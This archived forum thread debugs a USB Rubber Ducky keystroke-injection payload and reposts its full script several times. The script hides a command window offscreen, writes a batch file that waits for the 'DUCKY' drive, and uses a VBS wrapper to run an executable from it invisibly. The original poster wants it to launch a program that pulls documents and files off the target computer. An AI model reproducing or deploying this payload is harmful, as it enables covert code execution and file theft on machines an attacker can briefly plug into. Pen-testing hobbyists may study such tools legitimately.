Jump to content

Archived

This topic is now archived and is closed to further replies.

mahorelee

[BugReport][Payload] Problem with runexe from sd card playload

Recommended Posts

I got the payload to work but not with the .exe file I need it to work with. It will auto open paint or a calculator exe file but not this certain .exe file I have. The .exe file I have auto extracts documents and computer files into a folder. I have no idea why it will not work with this .exe but will with any other I have tried. The payload executes everything fine but the .exe does not open.

This is the payload https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

Any help would be great. Thanks.

Share this post


Link to post
Share on other sites

I tried it with the batch payload I posted, and the target file does indeed create a Message.txt at in the desired location on the target computer. So, the batch logic that waits for the drive to be mounted appears to be working.

C:\Windows\system32>erase /Q DuckyWait.bat

C:\Windows\system32>copy con DuckyWait.bat
:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set
myd=%%d
if Exist %myd% (
goto :break
)
timeout /t 30
goto :while1
:break
%myd%\MyExe.bat
^Z
        1 file(s) copied.

C:\Windows\system32>erase /Q invis.vbs

C:\Windows\system32>copy con invis.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
^Z
        1 file(s) copied.

C:\Windows\system32>wscript.exe invis.vbs DuckyWait.bat

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

File Not Found

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

06/24/2013  02:07 PM                17 Message.txt
               1 File(s)             17 bytes
               0 Dir(s)  555,544,006,656 bytes free

C:\Windows\system32>

I also tried it with one of my Hello World executables, and observed that the output appears to either be suppressed, or is not launching the executable. I am trying to figure out which of the preceding scenarios is actually occurring.

Share this post


Link to post
Share on other sites

I got it, need to add the START command before the executable name on that line in the batch file, ex...

Line:

STRING %myd%\myEXE.bat

change to...

STRING START %myd%\myEXE.exe

Have now updated the payload to reflect this change.

Share this post


Link to post
Share on other sites

Looks like Git Hub added a few new lines where there wasn't supposed to be any. I think I deleted them all now. Look for lines that look like they are supposed to be on one line, but are divided into two lines. ex...

STRING HELLO
WORLD
ENTER

Here is another post of the payload I am using to launch my hello world executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

Share this post


Link to post
Share on other sites

I tried this out on another Windows 7 computer, and now I am getting the same error that you are. The computer is refusing to write to the System32 folder. I believe that this has something to do with windows firewall, or something. I don't know if I will be able to find a solution to this particular problem. Simply changing the output folder may solve this particular problem.

Share this post


Link to post
Share on other sites

I wonder why the old code didn't have this problem but the new code does. I added STRING START %myd%\myEXE.exe in the old code but it did not work however it did not give me any errors like in the new code. Also why would a different output folder affect it if can not find the invis.vbs?

Share this post


Link to post
Share on other sites

I am putting a change directory command in the code so it will switch to the temp directory. The System32 folder appears to now be write protected by some process on the Windows 7 system. If anyone knows what is write protecting it I would like to know. Here is updated code, this should work. I have no idea why it is not allowing us to write there, my system allows it just fine.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

When I was having the error on the other computer I was talking about, copy con would act like it was going to work, and when I pressed enter to enter a line of code it hung, giving me an error about access being denied or something. Later on the script calls invis.vbs which consequently does not exist, which causes the popup box you posted. I actually didn't change that much in the code, the part that adds invis.vbs is exactly the same. I am betting that Microsoft rolled out some kind of a patch between testing the first version and the second version, which is why we are seeing different results.Whatever security setting is preventing the writing is probably turned off on my computer.

Share this post


Link to post
Share on other sites

I just tried the new code and it is still not working for me. I don't get the error any more but it will not run a notepad.exe renamed to HelloWorld like it did before or a HelloWorld.exe program. It does all that's in the picture but never runs the exit string for some reason and no program is run.

cmd_zps7dd2b60f.png

If you need more details just ask, I don't see why it wouldn't be working for me.

Share this post


Link to post
Share on other sites

Sorry, this one is my fault. Missed a couple of colons in the script. Will go back and change other payloads so other people don't copy and paste the mistake. Here is the script you want.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

Share this post


Link to post
Share on other sites

I am sorry for the trouble you are having mahorelee. Unfortunately this script is fairly complex, and when I originally posted it online there were problems I still needed to iron out. I believe the script is now in working order now as it runs fine on my computer, so odds are the problem is on your end. Please post another picture of what the script does when it runs. Also, post which operating system you have. Also post what happens when you simply run the batch script by it's self without the visual basic file making it execute silently. I will need a print screen of that.

EX...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\UserName>DuckyWait.bat

Here are also some things that could be going wrong.

-Make sure you have the right firmware (Twin duck)

-Make sure you are waiting for the ducky drive to mount, and after it mounts wait 1 minute at least.

-Make sure you are compiling and running on the same computer, so there are no architecture issues.

-Make sure you have a running executable file, and perhaps one you coded yourself. If you know C++ here is the hello world executable I am using at the bottom of the page. There is a copy file command in it so that it copies it's self to the desktop when it runs, but I commented it out for you. If you use it change the field UserName

-Make sure the executable file is on the root of the ducky.

-Make sure you updated the text file with the source code in it.

-Make sure you copied the .inf file to the root of the drive

-Make sure you re-named the ducky drive "DUCKY"

#include <iostream>
#include <Windows.h>

using namespace std;

int main(){

    //CopyFileA("HelloWorld.exe", "C:\\Users\\UserName\\Desktop\\HelloWorld.exe",0);

    cout << "Hello World!!!" << endl;

    system("pause");
}//end main

I am still thinking about what this could be, so I will check back here frequently.

Share this post


Link to post
Share on other sites

Okay thank you for your help.

I do have TwinDuck

I have left my Ducky in for a while each time so I do not think that is the problem

I am running on the same computer (Windows 7)

I do not know C++, I know Java and Python. But I have been using the default notepad exe file located on all windows and another exe I found. (I can make a hello world exe file with C++ if you think that would help, it would just take an hour or so)

The exe file is on the root (see picture)

Text file is updated

***I do not know what the .inf file is so that is not on the root of the Ducky. That might be the problem

Drive is renamed to DUCKY

The inject.bin is on the root of the drive too.

I will do troubleshooting and take screenshots here shortly if the .inf file is not the problem.

Duckusb_zps07c088ca.png

Share this post


Link to post
Share on other sites

Forget about the .inf file, I forgot we use bin files.

Also, how does one paste images into this forum, I can't find the option.

Share this post


Link to post
Share on other sites

Okay I will start doing what you asked. And below the yellow smiley face and a little to the left is an image button. You need to upload your picture to a site like photobucket then use the link to the image and plug it in.

Share this post


Link to post
Share on other sites

Here is what happens when the inject.bin is ran. It does this in cmd then exits out and the .exe never opens

duckusb2_zpsf763f2ea.png

I do not understand how to run the batch file. Do I go to cmd to get to it?

Share this post


Link to post
Share on other sites

I see what is going wrong now, when you copied and pasted it I think the website may have changed its formatting or something. In the for loop the 'd' should be a 'do'. Here is my output for the program.

DuckyWait_zps1a5c9f64.png

HelloWorld_zps88812951.png

You run the batch file simply by typing "DuckyWait.bat" into the command prompt.

Share this post


Link to post
Share on other sites

I posted the wrong picture, that was from before. This is the new one.

cmd_zps7dd2b60f.png

Here is what happens when I run DuckyWait.bat (How did I get that batch file in the first place?)

duckywait_zps10e8db0b.png

When the ducky mounts on my computer it mounts as (E) for the record.

Share this post


Link to post
Share on other sites

I have altered the payload posted earlier in this forum, please copy and paste the last one that I posted in this forum. Even if it looks like you already got the payload, I may have used the edit feature to change it. The last posting of the payload should correct your error.

There are colons missing in the copy that you got.

Also, my script uses the command line command "copy con" to generate DuckyWait.bat.

Share this post


Link to post
Share on other sites

The last posting of the code says last edited at 2:55 pm today. I tried it however and I get this in the cmd and the exit string does not get executed

duckusb3_zps39546261.png

Share this post


Link to post
Share on other sites

It is not in %appdata%, it is in %temp%. I probably commented out the exit string so you could see what it is doing, just un-comment it.

Share this post


Link to post
Share on other sites

It still does not run the exe. I tried going into the drive manually in the cmd and running it and it runs fine. So I do not know why it's not working. Is there any trouble shooting I can do for you that would help narrow down the problem?

Share this post


Link to post
Share on other sites

This is what happens when I run DuckyWait.bat, This pops up really fast but nothing else happens.

duckywaitbat_zps258d7870.png

When searching for wscript.exe nothing comes up

invis.vbs does show up

Share this post


Link to post
Share on other sites

You do not have the correct version of the code, copy and paste this in and it will work.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

And just in case it doesn't work here is a different version with a slight tweak.

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...